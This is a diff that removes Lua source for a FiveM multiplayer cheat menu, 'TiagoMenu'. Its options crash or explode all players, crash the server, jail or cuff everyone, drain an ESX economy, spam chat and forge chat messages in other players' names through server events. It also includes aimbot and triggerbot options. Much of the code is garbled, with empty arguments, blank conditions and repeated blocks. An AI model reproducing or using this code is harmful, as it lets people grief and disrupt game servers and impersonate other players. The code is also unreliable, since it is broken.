- if TiagoMenu.Button("~h~~r~Give All Weapons ~s~~h~Players") then
- for ids = 0, 128 do
- if ids ~= PlayerId() and GetPlayerServerId(ids) ~= 0 then
- for i = 1, #allWeapons do
- GiveWeaponToPed(PlayerPedId(ids), GetHashKey(allWeapons[i]), 1000, false, false)
- end
- end
- end
- elseif TiagoMenu.Button("~h~~r~Remove All Weapons ~s~~h~Players") then
- for ids = 0, 128 do
- if ids ~= PlayerId() and GetPlayerServerId(ids) ~= 0 then
- for i = 1, #allWeapons do
- RemoveAllPedWeapons(PlayerPedId(ids), true)
- end
- end
- end
- elseif TiagoMenu.Button("Set All Nearby Vehicles Plate Text") then
- local plateInput = KeyboardInput("Enter Plate Text (8 Characters):" , "", 100000000)
- for k in EnumerateVehicles() do
- RequestControlOnce(k)
- SetVehicleNumberPlateText(k, plateInput)
- end
- elseif TiagoMenu.Button("~r~Close ~s~the whole square ~y~NEW") then
- x, y, z = table.unpack(GetEntityCoords(GetPlayerPed(SelectedPlayer)))
- roundx = tonumber(string.format('%.2f', x))
- roundy = tonumber(string.format('%.2f', y))
- roundz = tonumber(string.format('%.2f', z))
- local e8 = -145066854
- RequestModel(e8)
- while not HasModelLoaded(e8) do
- Citizen.Wait(0)
- end
- local e9 = CreateObject(e8, 258.91, -933.1, 26.21, true, true, false)
- local ea = CreateObject(e8, 200.91, -874.1, 26.21, true, true, false)
- local e92 = CreateObject(e8, 126.52, -933.2, 26.21, true, true, false)
- local ea2 = CreateObject(e8, 184.52, -991.2, 26.21, true, true, false)
- SetEntityHeading(e9, 158.41)
- SetEntityHeading(ea, 90.51)
- SetEntityHeading(e92, 332.41)
- SetEntityHeading(ea2, 260.51)
- FreezeEntityPosition(e9, true)
- FreezeEntityPosition(ea, true)
- FreezeEntityPosition(e92, true)
- FreezeEntityPosition(ea2, true)
- elseif TiagoMenu.Button("~h~~r~Fake ~h~~s~chat Message") then
- local eX = KeyboardInput("Enter player name", "", 100) if eX then local dT = KeyboardInput("Enter message", "", 10000) if dT then TriggerServerEvent("adminmenu:allowall") TriggerServerEvent("_chat:messageEntered", eX, {0, 0x99, 255}, dT) end end
- elseif
- TiagoMenu.CheckBox(
- "~h~~r~Spam ~h~~s~chat",
- spam,
- function(enabled)
- spam = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~~r~Explode ~s~All Players",
- blowall,
- function(enabled)
- blowall = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~~r~Crash ~s~All Players",
- nuke,
- function(enabled)
- nuke = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~~r~Fuck ~s~Server economy ~g~ESX",
- esxdestroy,
- function(enabled)
- esxdestroy = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~~r~Jail ~s~All Players",
- banallusers,
- function(enabled)
- banallusers = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~~r~Cuff ~s~All Players",
- freezeall,
- function(enabled)
- freezeall = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~~r~Crash ~s~Server",
- servercrasher,
- function(enabled)
- servercrasher = enabled
- end)
- then
- elseif TiagoMenu.Button("~h~~b~------Fuck all Vehicles------") then
- elseif TiagoMenu.Button("~h~~r~Rampinator") then
- for vehicle in EnumerateVehicles() do local eY = CreateObject(-145066854, 0, 0, 0, true, true, true) NetworkRequestControlOfEntity(vehicle) AttachEntityToEntity(eY, vehicle, 0, 0, -1.0, 0.0, 0.0, 0, true, true, false, true, 1, true) NetworkRequestControlOfEntity(eY) SetEntityAsMissionEntity(eY, true, true) end
- elseif TiagoMenu.CheckBox("~h~~r~Delete~s~ Vehicles", deletenearestvehicle, function(eC) deletenearestvehicle = eC end) then
- elseif TiagoMenu.Button("~h~~r~BORGAR~s~ Vehicles") then local cC = GetHashKey("xs_prop_hamburgher_wl") for vehicle in EnumerateVehicles() do local cD = CreateObject(cC, 0, 0, 0, true, true, true) AttachEntityToEntity(cD, vehicle, 0, 0, -1.0, 0.0, 0.0, 0, true, true, false, true, 1, true) end
- elseif TiagoMenu.CheckBox("~h~~r~Explode~s~ Vehicles", explodevehicles, function(eC) explodevehicles = eC end) then
- elseif TiagoMenu.CheckBox("~h~~r~Fuck~s~ Vehicles", fuckallcars, function(eC) fuckallcars = eC end) then end;
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("WepMenu") then
- if TiagoMenu.MenuButton('~h~~r~→ ~y~Ammunition', 'WeaponTypes') then
- elseif TiagoMenu.MenuButton("~h~All Weapon", "SingleWepMenu") then
- elseif TiagoMenu.Button("~h~~g~Give ~s~~h~All Weapons") then
- for i = 1, #allWeapons do
- GiveWeaponToPed(PlayerPedId(), GetHashKey(allWeapons[i]), 1000, false, false)
- end
- elseif TiagoMenu.Button("~h~~r~Remove ~s~~h~All Weapons") then
- for i = 1, #allWeapons do
- RemoveAllPedWeapons(PlayerPedId(), true)
- end
- elseif TiagoMenu.Button("~h~~b~Give Ammo") then
- for i = 1, #allWeapons do
- AddAmmoToPed(PlayerPedId(), GetHashKey(allWeapons[i]), 200)
- end
- elseif
- TiagoMenu.ComboBox(
- "~h~Weapon/Melee Damage",
- {"1x (Default)", "2x", "3x", "4x", "5x"},
- currentItemIndex,
- selectedItemIndex,
- function(currentIndex, selectedIndex)
- currentItemIndex = currentIndex
- selectedItemIndex = selectedIndex
- SetPlayerWeaponDamageModifier(PlayerId(), selectedItemIndex)
- SetPlayerMeleeWeaponDamageModifier(PlayerId(), selectedItemIndex)
- end
- )
- then
- elseif TiagoMenu.CheckBox(
- "~h~Explosive Ammo",
- bifegfubffff,
- function(enabled)
- bifegfubffff = enabled
- end)
- then
- elseif TiagoMenu.CheckBox(
- "~h~No Reload",
- dwadawdwd,
- function(enabled)
- dwadawdwd = enabled
- SetPedInfiniteAmmoClip(PlayerPedId(), dwadawdwd)
- end)
- then
- elseif TiagoMenu.CheckBox(
- "~h~Oneshot",
- Oneshot,
- function(enabled)
- Oneshot = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~TriggerBot",
- TriggerBot,
- function(enabled)
- TriggerBot = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~AimBot",
- AimBot,
- function(enabled)
- AimBot = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~ForceGun",
- ForceGun,
- function(enabled)
- ForceGun = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~Infinite Ammo",
- InfAmmo,
- function(enabled)
- InfAmmo = enabled
- SetPedInfiniteAmmoClip(PlayerPedId(), InfAmmo)
- end
- )
- then
- elseif
- TiagoMenu.CheckBox("~h~Vehicle Gun",VehicleGun,
- function(enabled)VehicleGun = enabled end)
- then
- elseif
- TiagoMenu.CheckBox("~h~Delete Gun",DeleteGun,
- function(enabled)DeleteGun = enabled end)
- then
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('WeaponTypes') then
- for dp, dD in pairs(b0) do
- if
- TiagoMenu.MenuButton(
- '~h~~y~> ~s~' .. dp,
- 'WeaponTypeSelection'
- )
- then
- d4 = dD
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('WeaponTypeSelection') then
- for dp, dD in pairs(d4) do
- if TiagoMenu.MenuButton(, 'WeaponOptions') then
- d5 = dD
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('WeaponOptions') then
- if TiagoMenu.Button('~h~~y~Spawn Weapon inventory') then
- GiveWeaponToPed(GetPlayerPed(-1), GetHashKey(, 1000, false)
- end
- if TiagoMenu.Button('~h~+ ~g~Ammo') then
- SetPedAmmo(GetPlayerPed(-1), GetHashKey(, 5000)
- end
- if
- TiagoMenu.CheckBox(
- '~h~~r~Infinite ~s~Ammo',
- d5.bInfAmmo,
- function(dE)
- end
- )
- then
- d5.bInfAmmo = not d5.bInfAmmo
- SetPedInfiniteAmmo(GetPlayerPed(-1), d5.bInfAmmo, GetHashKey(
- SetPedInfiniteAmmoClip(GetPlayerPed(-1), true)
- end
- for dp, dD in pairs(d5.mods) do
- if TiagoMenu.MenuButton('~h~~r~> ~s~' .. dp, 'ModSelect') then
- d6 = dD
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('ModSelect') then
- for _, dD in pairs(d6) do
- if TiagoMenu.Button( then
- GiveWeaponComponentToPed(GetPlayerPed(-1), GetHashKey(, GetHashKey(
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("SingleWepMenu") then
- for i = 1, #allWeapons do
- if TiagoMenu.Button(allWeapons[i]) then
- GiveWeaponToPed(PlayerPedId(), GetHashKey(allWeapons[i]), 1000, false, false)
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened("VehMenu") then
- if TiagoMenu.Button("~r~→ ~s~Vehicles ~y~Name") then
- local ModelName = KeyboardInput("Enter Vehicle Spawn Name", "", 100)
- if ModelName and IsModelValid(ModelName) and IsModelAVehicle(ModelName) then
- RequestModel(ModelName)
- while not HasModelLoaded(ModelName) do
- Citizen.Wait(0)
- end
- local veh = CreateVehicle(GetHashKey(ModelName), GetEntityCoords(PlayerPedId()), GetEntityHeading(PlayerPedId()), true, true)
- SetPedIntoVehicle(PlayerPedId(), veh, -1)
- else
- drawNotification("~r~~h~Model is not valid!")
- end
- elseif TiagoMenu.IsMenuOpened('compacts') then
- for i=1, #compacts do
- if TiagoMenu.Button(compacts[i]) then
- SpawnVeh(compacts[i], PlaceSelf)
- end
- end
- elseif TiagoMenu.MenuButton('~r~→ ~s~Vehicles ~r~List', 'CarTypes') then
- elseif TiagoMenu.MenuButton('~r~→ ~o~LSC ~s~Customs', 'LSC') then
- elseif TiagoMenu.MenuButton("~r~→ ~s~Vehicle Boost", "VehBoostMenu") then
- elseif TiagoMenu.Button("~h~~g~Repair Vehicle") then
- SetVehicleFixed(GetVehiclePedIsIn(GetPlayerPed(-1), false))
- SetVehicleDirtLevel(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0.0)
- SetVehicleLights(GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
- SetVehicleBurnout(GetVehiclePedIsIn(GetPlayerPed(-1), false), false)
- Citizen.InvokeNative(0x1FD09E7390A74D54, GetVehiclePedIsIn(GetPlayerPed(-1), false), 0)
- elseif TiagoMenu.Button("~h~Max ~b~Exterior Tuning") then
- MaxOut(GetVehiclePedIsUsing(PlayerPedId())
- ) elseif TiagoMenu.Button("~h~Max ~b~Performance") then
- engine(GetVehiclePedIsUsing(PlayerPedId()))
- elseif TiagoMenu.Button("~h~Max All ~b~Tuning") then
- engine1(GetVehiclePedIsUsing(PlayerPedId()))
- elseif
- TiagoMenu.CheckBox(
- "~h~Rainbow Vehicle Colour",
- RainbowVeh,
- function(enabled)
- RainbowVeh = enabled
- end)
- then
- elseif TiagoMenu.Button("~h~~b~Change License Plate") then
- local playerPed = GetPlayerPed(-1)
- local playerVeh = GetVehiclePedIsIn(playerPed, true)
- local result = KeyboardInput("Enter the plate license you want", "", 10)
- if result then
- SetVehicleNumberPlateText(playerVeh, result)
- end
- elseif TiagoMenu.Button("~h~~r~Delete Vehicle") then
- DelVeh(GetVehiclePedIsUsing(PlayerPedId()))
- drawNotification("Vehicle Deleted")
- elseif TiagoMenu.Button("~h~Make vehicle dirty") then
- Clean(GetVehiclePedIsUsing(PlayerPedId()))
- drawNotification("Vehicle is now dirty")
- elseif TiagoMenu.Button("~h~Make vehicle clean") then
- Clean2(GetVehiclePedIsUsing(PlayerPedId()))
- drawNotification("Vehicle is now clean")
- elseif
- TiagoMenu.CheckBox(
- "~h~No Fall",
- Nofall,
- function(enabled)
- Nofall = enabled
- SetPedCanBeKnockedOffVehicle(PlayerPedId(), Nofall)
- end
- )
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~Vehicle Godmode",
- VehGod,
- function(enabled)
- VehGod = enabled
- end
- )
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~Vehicle Speedboost ~g~Num9",
- VehSpeed,
- function(enabled)
- VehSpeed = enabled
- end)
- then
- elseif TiagoMenu.CheckBox(
- "Super Handling",
- superGrip,
- function(enabled)
- superGrip = enabled
- enchancedGrip = false
- driftMode = false
- fdMode = false
- end)
- then
- elseif TiagoMenu.CheckBox(
- "Enhanced Grip",
- enchancedGrip,
- function(enabled)
- superGrip = false
- enchancedGrip = enabled
- driftMode = false
- fdMode = false
- end)
- then
- elseif TiagoMenu.CheckBox(
- "Drift Mode",
- driftMode,
- function(enabled)
- superGrip = false
- enchancedGrip = false
- driftMode = enabled
- fdMode = false
- end)
- then
- elseif TiagoMenu.CheckBox(
- "Formula Drift Mode",
- fdMode,
- function(enabled)
- superGrip = false
- enchancedGrip = false
- driftMode = false
- fdMode = enabled
- end)
- then
- elseif
- TiagoMenu.CheckBox(
- "~h~Super Grip",
- supergrip,
- function(enabled)
- supergrip = enabled
- end
- )
- then
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('tunings') then
- veh = GetVehiclePedIsUsing(PlayerPedId())
- for i, da in pairs(be) do
- if == 'extra' and #checkValidVehicleExtras() ~= 0 then
- if TiagoMenu.MenuButton(, then
- end
- elseif == 'neon' then
- if TiagoMenu.MenuButton(, then
- end
- elseif == 'paint' then
- if TiagoMenu.MenuButton(, then
- end
- elseif == 'wheeltypes' then
- if TiagoMenu.MenuButton(, then
- end
- else
- local at = checkValidVehicleMods(
- for dg, dh in pairs(at) do
- if TiagoMenu.MenuButton(, then
- end
- break
- end
- end
- end
- if IsToggleModOn(veh, 22) then
- xenonStatus = 'Installed'
- else
- xenonStatus = 'Not Installed'
- end
- if TiagoMenu.Button('Xenon Headlight', xenonStatus) then
- if not IsToggleModOn(veh, 22) then
- ToggleVehicleMod(veh, 22, not IsToggleModOn(veh, 22))
- else
- ToggleVehicleMod(veh, 22, not IsToggleModOn(veh, 22))
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('performance') then
- veh = GetVehiclePedIsUsing(PlayerPedId())
- for i, da in pairs(bf) do
- if TiagoMenu.MenuButton(, then
- end
- end
- if IsToggleModOn(veh, 18) then
- turboStatus = 'Installed'
- else
- turboStatus = 'Not Installed'
- end
- if TiagoMenu.Button('~h~~b~Turbo ~h~Tune', turboStatus) then
- if not IsToggleModOn(veh, 18) then
- ToggleVehicleMod(veh, 18, not IsToggleModOn(veh, 18))
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('primary') then
- TiagoMenu.MenuButton('~h~~p~-> ~s~Classic', 'classic1')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Metallic', 'metallic1')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Matte', 'matte1')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Metal', 'metal1')
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('secondary') then
- TiagoMenu.MenuButton('~h~~p~-> ~s~Classic', 'classic2')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Metallic', 'metallic2')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Matte', 'matte2')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Metal', 'metal2')
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('rimpaint') then
- TiagoMenu.MenuButton('~h~~p~-> ~s~Classic', 'classic3')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Metallic', 'metallic3')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Matte', 'matte3')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Metal', 'metal3')
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('classic1') then
- for dt, du in pairs(bh) do
- tp, ts = GetVehicleColours(veh)
- if tp == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and tp == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = true
- elseif b9 and curprim == then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and curprim ~= then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('metallic1') then
- for dt, du in pairs(bh) do
- tp, ts = GetVehicleColours(veh)
- if tp == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and tp == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = true
- elseif b9 and curprim == then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and curprim ~= then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('matte1') then
- for dt, du in pairs(bj) do
- tp, ts = GetVehicleColours(veh)
- if tp == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and tp == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleColours(veh,, oldsec)
- b9 = true
- elseif b9 and curprim == then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and curprim ~= then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('metal1') then
- for dt, du in pairs(bk) do
- tp, ts = GetVehicleColours(veh)
- if tp == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and tp == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- SetVehicleColours(veh,, oldsec)
- b9 = true
- elseif b9 and curprim == then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and curprim ~= then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('classic2') then
- for dt, du in pairs(bh) do
- tp, ts = GetVehicleColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- ba = table.pack(oldprim, oldsec)
- SetVehicleColours(veh, oldprim,
- b9 = true
- elseif b9 and cursec == then
- SetVehicleColours(veh, oldprim,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and cursec ~= then
- SetVehicleColours(veh, oldprim,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('metallic2') then
- for dt, du in pairs(bh) do
- tp, ts = GetVehicleColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- ba = table.pack(oldprim, oldsec)
- SetVehicleColours(veh, oldprim,
- b9 = true
- elseif b9 and cursec == then
- SetVehicleColours(veh, oldprim,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and cursec ~= then
- SetVehicleColours(veh, oldprim,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('matte2') then
- for dt, du in pairs(bj) do
- tp, ts = GetVehicleColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- ba = table.pack(oldprim, oldsec)
- SetVehicleColours(veh, oldprim,
- b9 = true
- elseif b9 and cursec == then
- SetVehicleColours(veh, oldprim,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and cursec ~= then
- SetVehicleColours(veh, oldprim,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('metal2') then
- for dt, du in pairs(bk) do
- tp, ts = GetVehicleColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- ba = table.pack(oldprim, oldsec)
- SetVehicleColours(veh, oldprim,
- b9 = true
- elseif b9 and cursec == then
- SetVehicleColours(veh, oldprim,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and cursec ~= then
- SetVehicleColours(veh, oldprim,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('classic3') then
- for dt, du in pairs(bh) do
- _, ts = GetVehicleExtraColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- _, currims = GetVehicleExtraColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- elseif b9 and currims == then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and currims ~= then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('metallic3') then
- for dt, du in pairs(bh) do
- _, ts = GetVehicleExtraColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- _, currims = GetVehicleExtraColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- elseif b9 and currims == then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and currims ~= then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('matte3') then
- for dt, du in pairs(bj) do
- _, ts = GetVehicleExtraColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- _, currims = GetVehicleExtraColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- elseif b9 and currims == then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and currims ~= then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('metal3') then
- for dt, du in pairs(bk) do
- _, ts = GetVehicleExtraColours(veh)
- if ts == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and ts == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- _, currims = GetVehicleExtraColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- elseif b9 and currims == then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and currims ~= then
- SetVehicleExtraColours(veh, oldpearl,
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('performance') then
- veh = GetVehiclePedIsUsing(PlayerPedId())
- for i, da in pairs(bf) do
- if TiagoMenu.MenuButton(, then
- end
- end
- if IsToggleModOn(veh, 18) then
- turboStatus = 'Installed'
- else
- turboStatus = 'Not Installed'
- end
- if TiagoMenu.Button('~h~~b~Turbo ~h~Tune', turboStatus) then
- if not IsToggleModOn(veh, 18) then
- ToggleVehicleMod(veh, 18, not IsToggleModOn(veh, 18))
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('primary') then
- TiagoMenu.MenuButton('~h~~p~-> ~s~Classic', 'classic1')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Metallic', 'metallic1')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Matte', 'matte1')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Metal', 'metal1')
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('secondary') then
- TiagoMenu.MenuButton('~h~~p~-> ~s~Classic', 'classic2')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Metallic', 'metallic2')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Matte', 'matte2')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Metal', 'metal2')
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('rimpaint') then
- TiagoMenu.MenuButton('~h~~p~-> ~s~Classic', 'classic3')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Metallic', 'metallic3')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Matte', 'matte3')
- TiagoMenu.MenuButton('~h~~p~-> ~s~Metal', 'metal3')
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('classic1') then
- for dt, du in pairs(bh) do
- tp, ts = GetVehicleColours(veh)
- if tp == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and tp == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
- oldprim, oldsec = GetVehicleColours(veh)
- oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
- ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = true
- elseif b9 and curprim == then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = false
- bb = -1
- ba = -1
- elseif b9 and curprim ~= then
- SetVehicleColours(veh,, oldsec)
- SetVehicleExtraColours(veh,, oldwheelcolour)
- b9 = true
- end
- end
- end
- TiagoMenu.Display()
- elseif TiagoMenu.IsMenuOpened('metallic1') then
- for dt, du in pairs(bh) do
- tp, ts = GetVehicleColours(veh)
- if tp == and not b9 then
- pricetext = 'Installed'
- else
- if b9 and tp == then
- pricetext = 'Previewing'
- else
- pricetext = 'Not Installed'
- end
- end
- curprim, cursec = GetVehicleColours(veh)
- if TiagoMenu.Button(, pricetext) then
- if not b9 then
- bb = 'paint'
- bd = false
